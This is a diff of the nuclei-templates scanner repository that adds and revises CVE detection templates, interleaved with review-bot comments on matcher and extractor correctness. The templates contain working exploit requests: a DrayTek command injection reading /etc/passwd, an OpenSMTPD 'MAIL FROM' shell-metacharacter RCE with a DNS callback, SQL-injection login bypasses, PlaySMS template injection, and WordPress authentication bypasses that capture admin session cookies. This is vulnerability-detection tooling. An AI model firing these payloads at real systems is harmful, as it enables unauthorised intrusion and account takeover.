"root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 490a0046304402205aa1631c11bb3beabb3041432b1abbac3a39611e4086b7f525da85e83f48fc0002205cdd1e5fdfa1abe2fd05dd3722e4975de5913462464aaf925db798da8eac1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-3580.yaml b/nuclei-templates/CVE-2020/cve-2020-3580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-3580.yaml rename to nuclei-templates/CVE-2020/cve-2020-3580.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35951.yaml b/nuclei-templates/CVE-2020/cve-2020-35951.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35951.yaml rename to nuclei-templates/CVE-2020/cve-2020-35951.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-36287.yaml b/nuclei-templates/CVE-2020/cve-2020-36287.yaml deleted file mode 100644 index 4744134944..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-36287.yaml +++ /dev/null 
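Review bot: The second request of the new cve-2020-35749 template hard-codes `post=372`, so the check presumably only fires on sites where that exact post ID exists and is handled by the plugin's resume download path, and other installations would be reported clean even when affected. If the handler does not depend on the post, a comment saying so would remove the doubt; if it does, the ID should not be a fixed constant. The `root:[x*]:0:0` regex also differs from the `root:.*:0:0:` form used by cve-2020-8515 in the same diff; either works, but one convention would be easier to maintain.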
@@ -1,36 +0,0 @@ -id: cve-2020-36287 - -info: - name: Jira Dashboard Gadgets / Information Disclosure - author: Jafar_Abo_Nada - severity: medium - description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. - tags: cve,cve2020,jira,atlassian,disclosure - reference: | - - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 - - # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs - -requests: - - raw: - - | - GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - | - GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "contains(body_1, '<userPrefsRepresentation>')" - - "status_code_2 != 401" - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-36365.yaml b/nuclei-templates/CVE-2020/cve-2020-36365.yaml deleted file mode 100644 index 771c887368..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-36365.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2020-36365 - -info: - name: Smartstore < 4.1.0 - Open redirect - author: 0x_Akoko - severity: medium - description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. - reference: - - https://github.com/smartstore/SmartStoreNET/issues/2113 - - https://www.cvedetails.com/cve/CVE-2020-36365 - - https://github.com/smartstore/SmartStoreNET - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-36365 - cwe-id: CWE-601 - metadata: - shodan-query: http.html:'content="Smartstore' - tags: cve,cve2020,redirect,smartstore - -requests: - - method: GET - - path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2020/cve-2020-5307.yaml b/nuclei-templates/CVE-2020/cve-2020-5307.yaml new file mode 100644 index 0000000000..160406214c --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-5307.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2020-5307 + +info: + name: Dairy Farm Shop Management System - SQL Injection + author: gy741 + description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + reference: + - https://cinzinga.com/CVE-2020-5307-5308/ + severity: critical + tags: cve,cve2020,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5307 + cwe-id: CWE-89 + +requests: + - raw: + - | + POST /dfsms/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "add-category.php" + + - type: status + status: + - 302 diff --git a/nuclei-templates/CVE-2020/cve-2020-7247.yaml b/nuclei-templates/CVE-2020/cve-2020-7247.yaml new file mode 100644 index 0000000000..f04736b5ce --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7247.yaml 
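Review bot: Key order in the `info` block of the new cve-2020-5307 template differs from the other templates added in this diff: `description` and `reference` come before `severity`, whereas cve-2020-19282, cve-2020-1956 and the rest use id/name/author/severity/description/reference; cve-2020-7247 and cve-2020-8771 likewise place `description` after `classification`. The success condition is also undocumented: the header match on `add-category.php` plus a 302 presumably reflects the post-login redirect, and a one-line comment above `matchers:` such as `# a successful login redirects to add-category.php` would state that assumption where a maintainer will see it.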
@@ -0,0 +1,44 @@ +id: CVE-2020-7247 +info: + name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution + author: princechaddha + severity: critical + reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 + tags: cve,cve2020,smtp,opensmtpd,network,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." + +network: + - inputs: + - read: 1024 + - data: "helo target\r\n" + read: 1024 + - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n" + read: 1024 + - data: "RCPT TO:<root>\r\n" + read: 1024 + - data: "DATA\r\n" + read: 1024 + - data: "\r\nxxxx\r\n.\r\n" + read: 1024 + - data: "QUIT\r\n" + read: 1024 + host: + - "{{Hostname}}" + - "{{Host}}:25" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: raw + words: + - "Message accepted for delivery" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7943.yaml b/nuclei-templates/CVE-2020/cve-2020-7943.yaml new file mode 100644 index 0000000000..c2bedd5d86 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7943.yaml 
@@ -0,0 +1,51 @@ +id: CVE-2020-7943 + +info: + name: Puppet Server/PuppetDB - Sensitive Information Disclosure + author: c-sh0 + severity: high + description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB. + remediation: | + Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected. + reference: + - https://puppet.com/security/cve/CVE-2020-7943 + - https://tickets.puppetlabs.com/browse/PDB-4876 + - https://puppet.com/security/cve/CVE-2020-7943/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-7943 + cwe-id: CWE-276,NVD-CWE-noinfo + epss-score: 0.08068 + epss-percentile: 0.93691 + cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: puppet + product: puppet_enterprise + tags: cve2020,cve,puppet,exposure,puppetdb + +http: + - method: GET + path: + - "{{BaseURL}}/metrics/v1/mbeans" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "trapperkeeper" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 4a0a0047304502206792db6fdd8e464da8351b87ddbba9a963f88f46d4f033c091fe6c389244575d022100fba0ea89c7927a275a26e5c8af022bbc1396176d3062c626ebf54a7fd9215679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-7980.yaml b/nuclei-templates/CVE-2020/cve-2020-7980.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7980.yaml rename to nuclei-templates/CVE-2020/cve-2020-7980.yaml 
diff --git a/nuclei-templates/CVE-2020/cve-2020-8515.yaml b/nuclei-templates/CVE-2020/cve-2020-8515.yaml new file mode 100644 index 0000000000..05ec699777 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8515.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-8515 + +info: + name: DrayTek pre-auth RCE + author: pikpikcu + severity: critical + description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. + reference: + - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) + - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ + tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /cgi-bin/mainfunction.cgi HTTP/1.1 + Host: {{Hostname}} + + action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8644.yaml b/nuclei-templates/CVE-2020/cve-2020-8644.yaml index 6d66fa8fa8..aae9417521 100644 --- a/nuclei-templates/CVE-2020/cve-2020-8644.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-8644.yaml 
@@ -5,24 +5,36 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 + - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-74 - tags: cve,cve2020,ssti,playsms,rce,unauth,kev + cwe-id: CWE-94 + epss-score: 0.96028 + epss-percentile: 0.99356 + cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: playsms + product: playsms + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce -requests: +http: - raw: - | GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -31,21 +43,11 @@ requests: X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= - cookie-reuse: true host-redirects: true max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: - - type: word part: body words: 
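Review bot: The second hunk of cve-2020-8644 removes `cookie-reuse: true` from the raw request sequence, yet the POST still submits the `{{csrf}}` token extracted from the first response; if playSMS validates that token against the session cookie set on the GET, the second request is rejected unless the targeted engine version reuses cookies by default for raw sequences. Either keep `cookie-reuse: true` (or its current equivalent) or add a comment stating that cookie reuse is implicit here. The matcher list of this hunk continues past the end of the hunk.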
@@ -55,4 +57,12 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/07 \ No newline at end of file + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body +# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8771.yaml b/nuclei-templates/CVE-2020/cve-2020-8771.yaml new file mode 100644 index 0000000000..6a244c4df1 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8771.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-8771 + +info: + name: WordPress WP Time Capsule Authentication Bypass + author: princechaddha + severity: critical + reference: https://github.com/SECFORCE/WPTimeCapsulePOC + tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept: */* + + IWP_JSON_PREFIX + + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept: */* + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '<div id="adminmenumain" role="navigation" aria-label="Main menu">' + - "<h1>Dashboard</h1>" + part: body + condition: and + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + regex: + - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" 
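Review bot: The extractor at the end of the new cve-2020-8771 template captures the value of the `wordpress_*` session cookie from the response headers into the scan output; the body and status matchers already establish the bypass, so this only adds a live administrator session token to reports and logs. Mark the extractor `internal: true` (as cve-2020-8644 does for its csrf extractor) or drop it.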
diff --git a/nuclei-templates/CVE-2020/cve-2020-8772.yaml b/nuclei-templates/CVE-2020/cve-2020-8772.yaml index 0036ff439d..beccc40018 100644 --- a/nuclei-templates/CVE-2020/cve-2020-8772.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-8772.yaml 
@@ -1,19 +1,83 @@ id: CVE-2020-8772 info: - name: InfiniteWP Improper Authentication - author: medbsq + name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass + author: princechaddha,scent2d severity: critical + description: | + WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can gain unauthorized administrative access to the WordPress site. + remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. + reference: + - https://wpscan.com/vulnerability/10011 + - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ + - https://wpvulndb.com/vulnerabilities/10011 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 + - https://github.com/ChoiSG/vwp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-8772 + cwe-id: CWE-862 + epss-score: 0.96607 + epss-percentile: 0.99546 + cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: revmakx + product: infinitewp_client + framework: wordpress + tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - body: "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==" +http: + - raw: + - | + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + 
Accept-Language: en-US,en;q=0.9 + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + + _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} + + host-redirects: true + + matchers-condition: and matchers: - type: word + part: header words: - - "IWPHEADER" - part: head + - "wordpress_logged_in" + + - type: word + part: body + words: + - "<IWPHEADER>" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: username + group: 1 + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' + internal: true + part: body + + - type: regex + name: username + group: 1 + regex: + - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' + internal: true + part: header +# digest: 490a0046304402203291fcf479be6ac8ef870d1f4d03c92df6410ee75121d38addd0c9377d8f40f7022020886d69171d32958ad6b8f1d435f68f1521494a7169dedcee8a8830052aa695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8982.yaml b/nuclei-templates/CVE-2020/cve-2020-8982.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8982.yaml rename to nuclei-templates/CVE-2020/cve-2020-8982.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-9043.yaml b/nuclei-templates/CVE-2020/cve-2020-9043.yaml index d5ce7f65b4..3a4e5cdd20 100644 --- a/nuclei-templates/CVE-2020/cve-2020-9043.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-9043.yaml 
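Review bot: The header extractor regex `'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'` only matches an https redirect and an author slug made of lowercase letters, while the body extractor accepts `[A-Za-z0-9]+`; for a plain-http target or a slug containing digits or hyphens the second request is sent with an unresolved `{{username}}`. Consider `'ion: https?:\/\/[a-z0-9.:-]+\/author\/([a-z0-9-]+)\/'` so both extractors agree. Both extractors are also named `username`; if both match, which value wins is not stated in the template, so a one-line comment on the intended precedence would help maintainers.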
@@ -1,26 +1,38 @@ id: CVE-2020-9043 info: - name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation + name: WordPress wpCentral <1.5.1 - Information Disclosure author: scent2d severity: high description: | - The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account. + WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. + remediation: | + Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/10074 - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 - https://wordpress.org/plugins/wp-central/#developers + - https://nvd.nist.gov/vuln/detail/CVE-2020-9043 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-9043 cwe-id: CWE-200 + epss-score: 0.04173 + epss-percentile: 0.91333 + cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 + verified: true + max-request: 4 + vendor: wpcentral + product: wpcentral + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -28,27 +40,22 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} - - | GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" - "contains(body_4, 'wpCentral Connection Key')" - contains(body_4, "pagenow = \'dashboard\'") @@ -57,16 +64,17 @@ requests: extractors: - type: regex name: authkey - part: body group: 1 regex: - 'style="word-wrap:break-word;">([a-z0-9]+)' internal: true + part: body - type: regex name: nonce - part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true + part: body +# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-9047.yaml b/nuclei-templates/CVE-2020/cve-2020-9047.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9047.yaml rename to nuclei-templates/CVE-2020/cve-2020-9047.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-9402.yaml b/nuclei-templates/CVE-2020/cve-2020-9402.yaml new file mode 100644 index 0000000000..172130f2c4 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-9402.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2020-9402 + +info: + name: Django SQL Injection + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + reference: + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 + - https://docs.djangoproject.com/en/3.0/releases/security/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 + author: geeknik + severity: high + tags: cve,cve2020,django,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 + +requests: + - method: GET + path: + - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1" + + matchers: + - type: word + words: + - "DatabaseError at" + - "ORA-29257:" + - "ORA-06512:" + - "Request Method:" + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-9496.yaml b/nuclei-templates/CVE-2020/cve-2020-9496.yaml new file mode 100644 index 0000000000..b07e38398a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-9496.yaml 
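Review bot: The matcher requires the Django debug error page (`DatabaseError at`, `Request Method:`), so this template only reports a hit when the target runs with DEBUG enabled and an Oracle backend; a non-match says nothing about whether the instance is patched, and the probe targets the `q` parameter at `/` as laid out in the linked vulhub lab rather than a generic Django route. A `description` or `metadata` comment along the lines of `# Detection relies on the DEBUG error page; absence of a match does not imply a fixed version` would set expectations for consumers of the results. The injected expression also makes the database host perform a name lookup, so the request is not side-effect-free and the template could reasonably carry the `intrusive` tag like CVE-2021-1472 in this commit.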
@@ -0,0 +1,44 @@ +id: CVE-2020-9496 + +info: + name: Apache OFBiz XML-RPC Java Deserialization + author: dwisiswant0 + severity: medium + description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03 + tags: cve,cve2020,apache,java,ofbiz + reference: + - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html + - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html + - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 + +requests: + - raw: + - | + POST /webtools/control/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Type: application/xml + + <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall> + + matchers-condition: and + matchers: + - type: word + words: + - "faultString" + - "No such service [ProjectDiscovery]" + - "methodResponse" + condition: and + part: body + - type: word + words: + - "Content-Type: text/xml" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-20200924a.yaml b/nuclei-templates/CVE-2020/cve-20200924a.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-20200924a.yaml rename to nuclei-templates/CVE-2020/cve-20200924a.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-1472.yaml b/nuclei-templates/CVE-2021/CVE-2021-1472.yaml index 0ccc8974cd..83948913f4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-1472.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-1472.yaml 
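Review bot: The matchers (`faultString`, `No such service [ProjectDiscovery]`, `methodResponse`, status 200) establish only that the unauthenticated `/webtools/control/xmlrpc` endpoint is reachable and dispatches method calls; they do not test for the deserialization or XSS behaviour the CVE describes, so every OFBiz instance exposing XML-RPC will match regardless of version. The description should say so, e.g. `Detects an exposed unauthenticated XML-RPC endpoint; confirm the OFBiz version (17.12.03 or earlier) before treating the result as vulnerable.` The description sentence also has a grammar slip: `XML-RPC request are vulnerable` should read `XML-RPC requests are vulnerable`.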
@@ -6,22 +6,33 @@ info: severity: critical description: | Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device. + remediation: | + Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability. reference: - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/ - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2021-1472 - https://nvd.nist.gov/vuln/detail/CVE-2021-1473 + - http://seclists.org/fulldisclosure/2021/Apr/39 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-1472 - cwe-id: CWE-287 + cwe-id: CWE-287,CWE-119 + epss-score: 0.97174 + epss-percentile: 0.99793 + cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: cisco + product: rv160_firmware shodan-query: http.html:"Cisco rv340" - verified: "true" - tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive + tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive -requests: +http: - raw: - | POST /upload HTTP/1.1 
